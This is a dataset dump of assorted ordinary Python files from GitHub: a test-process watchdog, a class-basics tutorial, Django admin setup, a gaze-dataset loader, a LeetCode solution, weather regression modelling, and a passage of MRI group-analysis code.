{"seq_id":"41193389223","text":"#! /usr/bin/env python\n\nfrom __future__ import print_function, division\n\nimport glob\nimport psutil\nimport sys\nimport time\n\nfrom psutil import AccessDenied, NoSuchProcess\n\ntime.sleep(60)\n\ntestPid = 0\nwhile not testPid:\n print(\"TESTWATCH: Polling\")\n for process in psutil.process_iter():\n try:\n if (\n \"python\" in process.cmdline()[0]\n and \"setup.py\" in process.cmdline()[1]\n and process.cmdline()[2] == \"test\"\n ):\n testPid = process.pid\n print(\"TESTWATCH: Found pid %s\" % testPid)\n except TypeError:\n if (\n \"python\" in process.cmdline[0]\n and \"setup.py\" in process.cmdline[1]\n and process.cmdline[2] == \"test\"\n ):\n testPid = process.pid\n print(\"TESTWATCH: Found pid %s\" % testPid)\n except (IndexError, AccessDenied, NoSuchProcess):\n pass\n time.sleep(10)\n\nnoXMLTime = time.time()\nwhile True:\n foundXML = False\n try:\n time.sleep(10)\n process = psutil.Process(testPid)\n try:\n userCPU = process.cpu_times().user\n except AttributeError:\n userCPU = process.get_cpu_times()[0]\n for xunitFile in glob.iglob(\"nosetests*.xml\"):\n foundXML = True\n\n if not foundXML:\n noXMLTime = time.time()\n else:\n xmlAge = time.time() - noXMLTime\n if xmlAge > 450:\n print(\"TESTWATCH: XML file is %s seconds old. Killing process\" % xmlAge)\n process.terminate()\n time.sleep(10)\n process.kill()\n except:\n sys.exit(0)\n\nsys.exit(0)\n","repo_name":"cms-sw/cms-bot","sub_path":"DMWM/TestWatchdog.py","file_name":"TestWatchdog.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
{"seq_id":"17997761320","text":"# # class basics \n# # ex StarCraft\n# name = \"Marine\"\n# hp = 40\n# damage = 5\n\n# print(\"{} unit has been created.\".format(name))\n# print(\"HP {0}, attack power {1}\\n\".format(hp, damage))\n\n# # Tank\n# tank_name = \"Tank\"\n# tank_hp = 150\n# tank_damage = 35\n\n# print(\"{} unit has been created.\".format(tank_name))\n# print(\"HP {0}, attack power {1}\\n\".format(tank_hp, tank_damage))\n\n# def attack(name, location, damage):\n# print(\"{0} : attacking the enemy in the {1} direction. Attack power: {2}\".format(name, location, damage))\n\n# attack(name, \"1 o'clock\", damage)\n# attack(tank_name, \"1 o'clock\", tank_damage) \n\nclass Unit:\n def __init__(self, name, hp, damage):\n self.name = name\n self.hp = hp\n self.damage = damage\n print(\"{0} unit has been created.\".format(self.name))\n print(\"HP {0}, attack power {1}\".format(self.hp, self.damage))\n\n\nmarine1 = Unit(\"Marine\", 40, 5)\nmarine2 = Unit(\"Marine\", 40, 5)\ntank = Unit(\"Tank\", 150, 35)\n\nwraith2 = Unit(\"Captured Wraith\", 80, 5)\nwraith2.cloaking = True\n\nif wraith2.cloaking == True:\n print(\"{0} is currently cloaked.\".format(wraith2.name))\n\n\n","repo_name":"changwon231/1_python","sub_path":"basic/23.class.py","file_name":"23.class.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"6583147070","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . 
import models\n\n# Register your models here.\n@admin.register(models.User)\n# class CustomUserAdmin(admin.ModelAdmin):\n#\nclass CustomUserAdmin(UserAdmin):\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"language\",\n \"currency\",\n \"gender\",\n \"language\",\n \"currency\",\n \"is_superhost\",\n \"is_staff\",\n \"email_verified\",\n \"login_method\",\n )\n\n list_filter = (\"is_superhost\", \"language\", \"currency\", \"is_superuser\", \"is_staff\")\n # default UserAmdin.fieldsets + CustomFieldSets\n fieldsets = UserAdmin.fieldsets + (\n (\n \"User Informations\",\n {\n \"fields\": (\n \"avatar\",\n \"gender\",\n \"language\",\n \"currency\",\n \"is_superhost\",\n \"birthday\",\n \"bio\",\n \"login_method\",\n \"email_verified\",\n ),\n },\n ),\n )\n","repo_name":"pleed0215/django_bnb","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70024886595","text":"import os\nimport cv2 \nimport torch\nimport random\nimport numpy as np\nimport numpy.matlib as matlib\nfrom easydict import EasyDict as edict\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport readcam\n\n\ndef Decode_ETH(line):\n anno = edict()\n anno.face = line[0]\n anno.gaze2d = line[1]\n anno.head2d = line[2]\n anno.name = line[3]\n anno.cam = line[4]\n anno.norm = line[6]\n\n anno.landmarks = line[8] \n return anno\n\ndef gazeto3d(gaze):\n assert gaze.size == 2, \"The size of gaze must be 2\"\n gaze_gt = np.zeros([3])\n gaze_gt[0] = -np.cos(gaze[0]) * np.sin(gaze[1])\n gaze_gt[1] = -np.sin(gaze[0])\n gaze_gt[2] = -np.cos(gaze[0]) * np.cos(gaze[1])\n return gaze_gt\n\n\ndef Decode_Dict():\n mapping = edict()\n mapping.ethtrain = Decode_ETH\n return mapping\n\n\ndef long_substr(str1, str2):\n substr = ''\n for i in range(len(str1)):\n for j in range(len(str1)-i+1):\n if j > len(substr) and (str1[i:i+j] in str2):\n substr = str1[i:i+j]\n return len(substr)\n\n\ndef Get_Decode(name):\n mapping = Decode_Dict()\n keys = list(mapping.keys())\n name = name.lower()\n score = [long_substr(name, i) for i in keys]\n key = keys[score.index(max(score))]\n return mapping[key]\n \n\nclass trainloader(Dataset): \n\n def __init__(self, dataset):\n\n # Read source data\n self.data = edict() \n self.data.line = []\n\n self.data.root = dataset.image\n\n self.data.decode = Get_Decode(dataset.name)\n\n self.data.cam_params = readcam.cam_params\n\n self.data.label = [self.__readlabel(dataset.label_cam1), \n self.__readlabel(dataset.label_cam2)]\n \n # build transforms\n self.transforms = transforms.Compose([\n transforms.ToTensor()\n ])\n\n\n def __readlabel(self, label, header=True):\n\n data = []\n\n if isinstance(label, list):\n\n for i in label:\n\n with open(i) as f: \n line = f.readlines()\n\n if header: \n line.pop(0)\n\n data.extend(line)\n else:\n with open(label) as f: \n data = f.readlines()\n\n if header: \n data.pop(0)\n\n return data\n\n\n\n def __len__(self):\n\n return len(self.data.label[0])\n\n def __gaussmap(self, center_x, center_y, R=20, IMAGE_HEIGHT=224, IMAGE_WIDTH=224):\n mask_x = matlib.repmat(center_x, IMAGE_HEIGHT, IMAGE_WIDTH)\n mask_y = matlib.repmat(center_y, IMAGE_HEIGHT, IMAGE_WIDTH)\n \n x1 = np.arange(IMAGE_WIDTH)\n x_map = matlib.repmat(x1, IMAGE_HEIGHT, 1)\n \n y1 = np.arange(IMAGE_HEIGHT)\n y_map = matlib.repmat(y1, IMAGE_WIDTH, 1)\n y_map = np.transpose(y_map)\n \n Gauss_map = 
np.sqrt((x_map-mask_x)**2+(y_map-mask_y)**2)\n \n Gauss_map = np.exp(-0.5*Gauss_map/R)\n\n return Gauss_map\n\n def __getitem__(self, idx):\n\n \n images = []\n labels = []\n cams = []\n poses = []\n names = []\n maps = []\n\n count = 0\n for label in self.data.label:\n\n # Read souce information\n line = label[idx]\n line = line.strip().split(\" \")\n anno = self.data.decode(line)\n\n # Image\n img = cv2.imread(os.path.join(self.data.root, anno.face))\n img = self.transforms(img)\n img = img.unsqueeze(0)\n images.append(img)\n\n # Label\n label = np.array(anno.gaze2d.split(\",\")).astype(\"float\")\n # label = gazeto3d(label)\n label = torch.from_numpy(label).type(torch.FloatTensor)\n label = label.unsqueeze(0)\n labels.append(label)\n\n # Camera rotation. Label = R * prediction\n norm_mat = np.array(anno.norm.split(\",\")).astype('float')\n norm_mat = np.resize(norm_mat, (3, 3))\n\n cam_mat = self.data.cam_params[int(anno.cam)-1].rotation\n\n new_mat = np.dot(norm_mat, cam_mat)\n inv_mat = np.linalg.inv(new_mat)\n inv_mat = torch.from_numpy(inv_mat).type(torch.FloatTensor)\n\n new_mat = torch.from_numpy(new_mat).type(torch.FloatTensor)\n new_mat = new_mat.unsqueeze(0)\n\n cams.append(inv_mat)\n\n # Pos.\n z_axis = np.linalg.inv(new_mat)[:, 2].flatten()\n translation = self.data.cam_params[int(anno.cam)-1].translation\n pos = np.concatenate([z_axis, translation], 0)\n pos = torch.from_numpy(pos).type(torch.FloatTensor)\n pos = pos.unsqueeze(0) \n poses.append(pos)\n\n\n count = 0\n\n # Name\n names.append(anno.name)\n\n label_dict = edict()\n label_dict.gaze = torch.cat(labels, 0)\n\n label_dict.name = names[0]\n\n\n data = edict()\n data.face = torch.cat(images, 0)\n data.cams = torch.cat(cams, 0)\n data.pos = torch.cat(poses, 0)\n data.name = names\n\n return data, label_dict\n\ndef loader(source, batch_size, shuffle=True, num_workers=0):\n dataset = trainloader(source)\n print(f\"-- [Read Data]: Source: {source.image}\")\n print(f\"-- [Read Data]: Total num: {len(dataset)}\")\n load = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)\n return load\n\n","repo_name":"yihuacheng/DVGaze","sub_path":"Code/eth/reader/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"11216292840","text":"#\n# [48] Rotate Image\n#\n# https://leetcode.com/problems/rotate-image/description/\n#\n# algorithms\n# Medium (41.31%)\n# Total Accepted: 151.9K\n# Total Submissions: 367.8K\n# Testcase Example: '[[1,2,3],[4,5,6],[7,8,9]]'\n#\n# You are given an n x n 2D matrix representing an image.\n# \n# Rotate the image by 90 degrees (clockwise).\n# \n# Note:\n# You have to rotate the image in-place, which means you have to modify the\n# input 2D matrix directly. 
DO NOT allocate another 2D matrix and do the\n# rotation.\n# \n# \n# Example 1:\n# \n# Given input matrix = \n# [\n# ⁠ [1,2,3],\n# ⁠ [4,5,6],\n# ⁠ [7,8,9]\n# ],\n# \n# rotate the input matrix in-place such that it becomes:\n# [\n# ⁠ [7,4,1],\n# ⁠ [8,5,2],\n# ⁠ [9,6,3]\n# ]\n# \n# \n# \n# Example 2:\n# \n# Given input matrix =\n# [\n# ⁠ [ 5, 1, 9,11],\n# ⁠ [ 2, 4, 8,10],\n# ⁠ [13, 3, 6, 7],\n# ⁠ [15,14,12,16]\n# ], \n# \n# rotate the input matrix in-place such that it becomes:\n# [\n# ⁠ [15,13, 2, 5],\n# ⁠ [14, 3, 4, 1],\n# ⁠ [12, 6, 8, 9],\n# ⁠ [16, 7,10,11]\n# ]\n# \n# \n#\nclass Solution: \n def rotate(self, matrix): \n \"\"\" \n :type matrix: List[List[int]] \n :rtype: void Do not return anything, modify matrix in-place instead. \n \"\"\" \n # 5 star, no idea.\n n = len(matrix) \n for i in range(n): \n for j in range(i+1, n): \n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j] \n for i in range(n):\n matrix[i].reverse() \n","repo_name":"goalong/lc","sub_path":"v1/48.rotate-image.136237871.ac.python3.py","file_name":"48.rotate-image.136237871.ac.python3.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"25208588705","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split, GridSearchCV\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LinearRegression\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.linear_model import Ridge, Lasso\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, f1_score\r\n\r\n# Load and preprocess data\r\ndata = pd.read_csv(r'C:\\Users\\white\\Desktop\\Dissertation\\data\\weather_data_cleaned.csv')\r\n\r\nX = data[['dew_point',\r\n'feels_like',\r\n'temp_min',\r\n'temp_max',\r\n'pressure',\r\n'humidity',\r\n'wind_speed',\r\n'wind_deg',\r\n'snow_1h',\r\n'clouds_all']]\r\ny_precipitation = data['rain_1h'] # Combined precipitation from both columns\r\ny_mean_temperature = data['temp']\r\n\r\n# Feature Scaling\r\nscaler = StandardScaler()\r\nX_scaled = scaler.fit_transform(X)\r\n\r\n# Create lag features for sequences\r\nsequence_length = 7 # Number of past days to consider for prediction\r\nX_sequences = []\r\ny_sequences_precip = []\r\ny_sequences_temp = []\r\n\r\nfor i in range(len(X_scaled) - sequence_length):\r\n X_sequences.append(X_scaled[i:i+sequence_length])\r\n y_sequences_precip.append(y_precipitation[i+sequence_length])\r\n y_sequences_temp.append(y_mean_temperature[i+sequence_length])\r\n\r\nX_sequences = np.array(X_sequences)\r\ny_sequences_precip = np.array(y_sequences_precip)\r\ny_sequences_temp = np.array(y_sequences_temp)\r\n\r\nprint(y_sequences_temp)\r\n\r\n# Train-test split\r\nX_train, X_test, y_precip_train, y_precip_test, y_temp_train, y_temp_test = train_test_split(\r\n X_sequences, y_sequences_precip, y_sequences_temp, test_size=0.1, random_state=42, shuffle=False\r\n)\r\n\r\n# Reshape sequences for Linear Regression\r\nX_train_reshaped = X_train.reshape(X_train.shape[0], -1)\r\nX_test_reshaped = X_test.reshape(X_test.shape[0], -1)\r\n\r\n# Train Linear Regression model\r\nmodel_precip = LinearRegression()\r\nmodel_temp = LinearRegression()\r\n\r\nmodel_precip.fit(X_train_reshaped, y_precip_train)\r\nmodel_temp.fit(X_train_reshaped, y_temp_train)\r\n\r\n# Predict for the upcoming week\r\nweek_weather_pred = 
model_temp.predict(X_test_reshaped)\r\nweek_precip_pred = model_precip.predict(X_test_reshaped)\r\n\r\n# Evaluation metrics\r\ndef evaluate_metrics(y_true, y_pred):\r\n r2 = r2_score(y_true, y_pred)\r\n mse = mean_squared_error(y_true, y_pred)\r\n rmse = np.sqrt(mse)\r\n mae = mean_absolute_error(y_true, y_pred)\r\n return r2, mse, rmse, mae\r\n\r\ndef evaluate_f1(y_true, y_pred):\r\n y_pred_class = np.where(y_pred > 0.5, 1, 0) # Convert to binary classes\r\n f1 = f1_score(y_true, y_pred_class)\r\n return f1\r\n\r\n# Evaluate Linear Regression (Mean Temperature)\r\nr2_linear_temp, mse_linear_temp, rmse_linear_temp, mae_linear_temp = evaluate_metrics(y_temp_test, week_weather_pred)\r\n\r\n\r\n# Evaluate Linear Regression (Precipitation)\r\nr2_linear_precip, mse_linear_precip, rmse_linear_precip, mae_linear_precip = evaluate_metrics(y_precip_test, week_precip_pred)\r\n\r\n\r\n# Print evaluation metrics\r\nprint(\"Linear Regression Metrics (Mean Temperature):\")\r\nprint(f'R-squared (R2): {r2_linear_temp:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_linear_temp:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_linear_temp:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_linear_temp:.2f}')\r\n\r\n\r\nprint(\"Linear Regression Metrics (Precipitation):\")\r\nprint(f'R-squared (R2): {r2_linear_precip:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_linear_precip:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_linear_precip:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_linear_precip:.2f}')\r\n\r\n\r\n# Visualization\r\ndays = range(len(y_temp_test))\r\nplt.plot(days, y_temp_test, label='Actual Mean Temp', marker='o')\r\nplt.plot(days, week_weather_pred, label='Predicted Mean Temp', marker='o')\r\nplt.xlabel('Days')\r\nplt.ylabel('Mean Temperature')\r\nplt.title('Predicted Mean Temperature for Upcoming Week')\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(days, y_precip_test, label='Actual Precipitation', marker='o')\r\nplt.plot(days, week_precip_pred, label='Predicted Precipitation', marker='o')\r\nplt.xlabel('Days')\r\nplt.ylabel('Precipitation')\r\nplt.title('Predicted Precipitation for Upcoming Week')\r\nplt.legend()\r\nplt.show()\r\n\r\n# Hyperparameter tuning using GridSearchCV for Ridge Regression\r\nparam_grid_ridge = {\r\n 'alpha': [0.01, 0.1, 1, 10, 100]\r\n}\r\n\r\ngrid_search_ridge_precip = GridSearchCV(Ridge(), param_grid_ridge, cv=5)\r\ngrid_search_ridge_precip.fit(X_train, y_precip_train)\r\n\r\ngrid_search_ridge_temp = GridSearchCV(Ridge(), param_grid_ridge, cv=5)\r\ngrid_search_ridge_temp.fit(X_train, y_temp_train)\r\n\r\nbest_ridge_model_precip = grid_search_ridge_precip.best_estimator_\r\nbest_ridge_model_temp = grid_search_ridge_temp.best_estimator_\r\n\r\n# Hyperparameter tuning using GridSearchCV for Lasso Regression\r\nparam_grid_lasso = {\r\n 'alpha': [0.01, 0.1, 1, 10, 100]\r\n}\r\n\r\ngrid_search_lasso_precip = GridSearchCV(Lasso(), param_grid_lasso, cv=5)\r\ngrid_search_lasso_precip.fit(X_train, y_precip_train)\r\n\r\ngrid_search_lasso_temp = GridSearchCV(Lasso(), param_grid_lasso, cv=5)\r\ngrid_search_lasso_temp.fit(X_train, y_temp_train)\r\n\r\nbest_lasso_model_precip = grid_search_lasso_precip.best_estimator_\r\nbest_lasso_model_temp = grid_search_lasso_temp.best_estimator_\r\n\r\n# Visualization of Ridge Regression hyperparameter tuning results\r\nresults_ridge_precip = grid_search_ridge_precip.cv_results_\r\nresults_ridge_temp = grid_search_ridge_temp.cv_results_\r\n\r\nplt.figure(figsize=(12, 6))\r\n\r\nplt.subplot(1, 2, 
1)\r\nplt.plot(param_grid_ridge['alpha'], results_ridge_precip['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Ridge): Precipitation Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.subplot(1, 2, 2)\r\nplt.plot(param_grid_ridge['alpha'], results_ridge_temp['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Ridge): Mean Temperature Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Visualization of Lasso Regression hyperparameter tuning results\r\nresults_lasso_precip = grid_search_lasso_precip.cv_results_\r\nresults_lasso_temp = grid_search_lasso_temp.cv_results_\r\n\r\nplt.figure(figsize=(12, 6))\r\n\r\nplt.subplot(1, 2, 1)\r\nplt.plot(param_grid_lasso['alpha'], results_lasso_precip['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Lasso): Precipitation Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.subplot(1, 2, 2)\r\nplt.plot(param_grid_lasso['alpha'], results_lasso_temp['mean_test_score'], marker='o')\r\nplt.title('Hyperparameter Tuning (Lasso): Mean Temperature Prediction')\r\nplt.xlabel('Alpha')\r\nplt.ylabel('Mean Test Score')\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Predict for the upcoming week using Ridge Regression models\r\nweek_weather_pred_ridge_temp = best_ridge_model_temp.predict(X_test)\r\nweek_precip_pred_ridge = best_ridge_model_precip.predict(X_test)\r\n\r\n# Predict for the upcoming week using Lasso Regression models\r\nweek_weather_pred_lasso_temp = best_lasso_model_temp.predict(X_test)\r\nweek_precip_pred_lasso = best_lasso_model_precip.predict(X_test)\r\n\r\n\r\n# Evaluate Ridge Regression (Mean Temperature)\r\nr2_ridge_temp, mse_ridge_temp, rmse_ridge_temp, mae_ridge_temp = evaluate_metrics(y_temp_test, week_weather_pred_ridge_temp)\r\nf1_ridge_temp = evaluate_f1(y_temp_test, week_weather_pred_ridge_temp)\r\n\r\n# Evaluate Ridge Regression (Precipitation)\r\nr2_ridge_precip, mse_ridge_precip, rmse_ridge_precip, mae_ridge_precip = evaluate_metrics(y_precip_test, week_precip_pred_ridge)\r\nf1_ridge_precip = evaluate_f1(y_precip_test, week_precip_pred_ridge)\r\n\r\n# Evaluate Lasso Regression (Mean Temperature)\r\nr2_lasso_temp, mse_lasso_temp, rmse_lasso_temp, mae_lasso_temp = evaluate_metrics(y_temp_test, week_weather_pred_lasso_temp)\r\nf1_lasso_temp = evaluate_f1(y_temp_test, week_weather_pred_lasso_temp)\r\n\r\n# Evaluate Lasso Regression (Precipitation)\r\nr2_lasso_precip, mse_lasso_precip, rmse_lasso_precip, mae_lasso_precip = evaluate_metrics(y_precip_test, week_precip_pred_lasso)\r\nf1_lasso_precip = evaluate_f1(y_precip_test, week_precip_pred_lasso)\r\n\r\n# Print evaluation metrics\r\nprint(\"Ridge Regression Metrics (Mean Temperature):\")\r\nprint(f'R-squared (R2): {r2_ridge_temp:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_ridge_temp:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_ridge_temp:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_ridge_temp:.2f}')\r\nprint(f'F1 Score: {f1_ridge_temp:.2f}')\r\n\r\nprint(\"Ridge Regression Metrics (Precipitation):\")\r\nprint(f'R-squared (R2): {r2_ridge_precip:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_ridge_precip:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_ridge_precip:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_ridge_precip:.2f}')\r\nprint(f'F1 Score: {f1_ridge_precip:.2f}')\r\n\r\nprint(\"Lasso Regression Metrics (Mean Temperature):\")\r\nprint(f'R-squared (R2): 
{r2_lasso_temp:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_lasso_temp:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_lasso_temp:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_lasso_temp:.2f}')\r\nprint(f'F1 Score: {f1_lasso_temp:.2f}')\r\n\r\nprint(\"Lasso Regression Metrics (Precipitation):\")\r\nprint(f'R-squared (R2): {r2_lasso_precip:.2f}')\r\nprint(f'Mean Squared Error (MSE): {mse_lasso_precip:.2f}')\r\nprint(f'Root Mean Squared Error (RMSE): {rmse_lasso_precip:.2f}')\r\nprint(f'Mean Absolute Error (MAE): {mae_lasso_precip:.2f}')\r\nprint(f'F1 Score: {f1_lasso_precip:.2f}')","repo_name":"qt22010/Dissertation","sub_path":"Failed/Linear fixed mayb test1.py","file_name":"Linear fixed mayb test1.py","file_ext":"py","file_size_in_byte":9477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71724386113","text":"import os\nimport shutil\nfrom shutil import move\n\nimport numpy\n\nfrom data import plot_data\nfrom group.SPMModels import SPMModels\nfrom utility.images.Image import Image\nfrom utility.matlab import call_matlab_spmbatch\nfrom utility.myfsl.utils.run import rrun\nfrom utility.fileutilities import sed_inplace, get_dirname\nfrom utility.utilities import listToString\nfrom utility.fileutilities import sed_inplace\nfrom utility.utilities import get_col_from_listmatrix\n\nclass GroupAnalysis:\n\n def __init__(self, proj):\n\n self.subjects_list = None\n self.working_dir = \"\"\n self.project = proj\n self._global = self.project.globaldata\n\n self.spm = SPMModels(proj)\n\n # ---------------------------------------------------\n #region DATA PREPARATION\n # ====================================================================================================================================================\n\n # given a subjects list, it creates their template and project all the c1 images to its normalized version\n # create a folder name and its subfolders : subjects (normalized images), flowfields, stats\n # RC1_IMAGES: { '/media/data/MRI/projects/ELA/subjects/0202/s1/mpr/rc20202-t1.nii,1'\n # '/media/data/MRI/projects/ELA/subjects/0503/s1/mpr/rc20503-t1.nii,1'}\n def create_vbm_spm_template_normalize(self, name, subjects_list, spm_template_name=\"group_spm_dartel_createtemplate_normalize\"):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in create_vbm_spm_template_normalize, given subjs params is neither a string nor a list\")\n return\n\n self.working_dir = os.path.join(self.project.vbm_dir, name)\n\n out_batch_job, out_batch_start = self.project.adapt_batch_files(spm_template_name, \"mpr\", \"vbmtemplnorm_\" + name)\n\n # =======================================================\n # START !!!!\n # =======================================================\n # create job file\n T1_darteled_images_1 = \"{\\r\"\n T1_darteled_images_2 = \"{\\r\"\n T1_images_1 = \"{\\r\"\n\n for subj in self.subjects_list:\n T1_darteled_images_1 = T1_darteled_images_1 + \"\\'\" + subj.t1_dartel_rc1.upath + \",1\\'\\r\"\n T1_darteled_images_2 = T1_darteled_images_2 + \"\\'\" + subj.t1_dartel_rc2.upath + \",1\\'\\r\"\n T1_images_1 = T1_images_1 + \"\\'\" + subj.t1_dartel_c1.upath + \"\\'\\r\"\n\n T1_darteled_images_1 = T1_darteled_images_1 + \"\\r}\"\n T1_darteled_images_2 = T1_darteled_images_2 + \"\\r}\"\n T1_images_1 = T1_images_1 + \"\\r}\"\n\n sed_inplace(out_batch_job, \"\", T1_darteled_images_1)\n sed_inplace(out_batch_job, \"\", T1_darteled_images_2)\n sed_inplace(out_batch_job, \"\" , 
T1_images_1)\n sed_inplace(out_batch_job, \"\", name)\n sed_inplace(out_batch_job, \"\", self.project.vbm_dir)\n\n call_matlab_spmbatch(out_batch_start, [self._global.spm_functions_dir, self._global.spm_dir])\n print(\"running SPM batch template: \" + name)\n\n affine_trasf_mat = os.path.join(self.subjects_list[0].t1_spm_dir, name + \"_6_2mni.mat\")\n move(affine_trasf_mat, os.path.join(self.project.vbm_dir, name, \"flowfields\", name + \"_6_2mni.mat\"))\n\n return self.working_dir\n\n # create a fslvbm folder using spm's vbm output\n def create_fslvbm_from_spm(self, subjects_list, smw_folder, vbmfsl_folder):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in create_fslvbm_from_spm, given subjs params is neither a string nor a list\")\n return\n\n stats_dir = os.path.join(vbmfsl_folder, \"stats\")\n struct_dir = os.path.join(vbmfsl_folder, \"struct\")\n\n os.makedirs(stats_dir, exist_ok=True)\n os.makedirs(struct_dir, exist_ok=True)\n\n for subj in self.subjects_list:\n Image(os.path.join(smw_folder, \"smwc1T1_biascorr_\" + subj.label)).cp(os.path.join(struct_dir, \"smwc1T1_biascorr_\" + subj.label))\n rrun(\"fslmaths \" + os.path.join(struct_dir, \"smwc1T1_biascorr_\" + subj.label) + \" -thr 0.1 \" + os.path.join(struct_dir, \"smwc1T1_biascorr_\" + subj.label))\n\n # create merged image\n # cur_dir = os.getcwd()\n os.chdir(stats_dir)\n\n # trick...since there are nii and nii.gz. by adding \".gz\" in the check I consider only the nii\n images = [os.path.join(struct_dir, f) for f in os.listdir(struct_dir) if os.path.isfile(os.path.join(struct_dir, f + \".gz\"))]\n\n rrun(\"fslmerge -t GM_merg\" + \" \" + \" \".join(images))\n rrun(\"fslmaths GM_merg\" + \" -Tmean -thr 0.05 -bin GM_mask -odt char\")\n\n shutil.rmtree(struct_dir)\n\n def tbss_run_fa(self, subjects_list, odn, prepare=True, proc=True, postreg=\"S\", prestat_thr=0.2, cleanup=True):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in tbss_run_fa, given grouplabel_or_subjlist params is neither a string nor a list\")\n return\n\n root_analysis_folder = os.path.join(self.project.tbss_dir, odn)\n\n os.makedirs(root_analysis_folder, exist_ok=True)\n os.makedirs(os.path.join(root_analysis_folder, \"design\"), exist_ok=True)\n\n # copy DTIFIT IMAGES to MAIN_ANALYSIS_FOLDER\n if prepare:\n\n print(\"copy subjects' corresponding dtifit_FA images to analysis folder\")\n for subj in self.subjects_list:\n src_img = Image(os.path.join(subj.dti_dir, subj.dti_fit_label + \"_FA\"))\n dest_img = os.path.join(root_analysis_folder, subj.dti_fit_label + \"_FA\")\n src_img.cp(dest_img)\n\n if proc:\n curr_dir = os.getcwd()\n os.chdir(root_analysis_folder)\n\n print(\"preprocessing dtifit_FA images\")\n rrun(\"tbss_1_preproc *.nii.gz\")\n print(\"co-registrating images to MNI template\")\n rrun(\"tbss_2_reg -T\")\n print(\"postreg\")\n rrun(\"tbss_3_postreg -\" + postreg)\n rrun(\"tbss_4_prestats \" + str(prestat_thr))\n\n os.chdir(curr_dir)\n\n if cleanup:\n # shutil.rmtree(os.path.join(root_analysis_folder, \"FA\"))\n shutil.rmtree(os.path.join(root_analysis_folder, \"origdata\"))\n shutil.rmtree(os.path.join(root_analysis_folder, \"design\"))\n\n return root_analysis_folder\n\n # run tbss for other modalities = [\"MD\", \"L1\", ....]\n # you first must have done run_tbss_fa\n def tbss_run_alternatives(self, subjects_list, input_folder, modalities, prepare=True, proc=True, cleanup=True):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n 
print(\"ERROR in tbss_run_alternatives, given grouplabel_or_subjlist params is neither a string nor a list\")\n return\n\n input_stats = os.path.join(input_folder, \"stats\")\n\n # copy DTIFIT IMAGES to MAIN_ANALYSIS_FOLDER\n if prepare:\n\n print(\"copy subjects' corresponding dtifit_XX images to analysis folder\")\n for subj in self.subjects_list:\n\n for mod in modalities:\n alternative_folder = os.path.join(input_folder, mod) # /group_analysis/tbss/population/MD\n os.makedirs(alternative_folder, exist_ok=True)\n\n src_img = Image(os.path.join(subj.dti_dir, subj.dti_fit_label + \"_\" + mod), must_exist=True, msg=\"GroupAnalysis.tbss_run_alternatives\")\n dest_img = os.path.join(alternative_folder, subj.dti_fit_label + \"_\" + mod)\n src_img.cp(dest_img)\n\n src_img = Image(os.path.join(alternative_folder, subj.dti_fit_label + \"_\" + mod), must_exist=True, msg=\"GroupAnalysis.tbss_run_alternatives\")\n dest_img = os.path.join(alternative_folder, subj.dti_fit_label + \"_FA\")\n src_img.mv(dest_img)\n\n Image(os.path.join(input_stats, \"mean_FA_skeleton_mask_dst\")).cp(os.path.join(input_stats, \"mean_\" + mod + \"_skeleton_mask_dst\"))\n 